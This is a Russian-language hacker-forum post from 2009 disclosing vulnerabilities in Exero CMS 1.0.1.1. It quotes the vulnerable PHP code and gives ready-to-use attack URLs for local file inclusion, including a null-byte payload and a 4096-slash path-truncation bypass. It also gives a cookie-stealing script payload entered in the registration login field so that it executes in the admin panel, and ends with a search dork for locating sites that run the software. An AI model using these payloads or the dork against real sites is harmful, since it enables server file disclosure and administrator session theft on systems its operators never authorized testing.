PDA

Просмотр полной версии : Exero CMS 1.0.1.1 Multiple Vulnerabilities


Spyder
13.04.2009, 22:38
Exero CMS 1.0.1.1 Multiple Vulnerabilities

1) Local File Inclusion

Need: magic_quotes_gpc=off
Файл: index.php

if(empty($_REQUEST['module'])) {
include("modules/".$ecms->settings['defaultmod']);
} else if(file_exists("modules/".$_REQUEST['module']."/index.php")) {
include("modules/".$_REQUEST['module']."/index.php");
} else {
include("themes/$theme/errors/404.php");
}


Собственно инклуд тут в двух местах

www.site.com/index.php?module={INC}%00
и
www.site.com/index.php?module=not_exist_module&theme={INC}%00

Для второго случая наличие magic_quotes_gpc=off не обязательно, обходим известным способом со слешами
www.site.com/index.php?module=not_exist_module&theme={INC} {/ x 4096}


2) XSS

XSS в коментарии к новосятм
Файл: /modules/news/index.php

XSS при регистрации. Указываем в логине <script>alert(document.cookie)</script>
Файлы подверженые уязвимости:

/modules/community/members.php

$getuserinfo = $db->query("SELECT * FROM users");
while($userinfo = $db->fetch_array($getuserinfo)) {
$users[$users['rowcount']] = $userinfo;
$users['rowcount']++;
}


/admin/users.php

$getusers = $db->query("SELECT * FROM ".TABLE_PREFIX."users ORDER BY uid ASC");
while($userinfo = $db->fetch_array($getusers)) {
print_multicol_row(array($userinfo['username']."[align:left]"=>"","<a href=\"users.php?do=edit&user=".$userinfo['uid']."\">Edit</a>, <a href=\"users.php?do=delete&user=".$userinfo['uid']."\">Delete</a>[align:right]"=>"140"));
}

т.е xss будет прямо в админке

dork: "Powered by Exero CMS"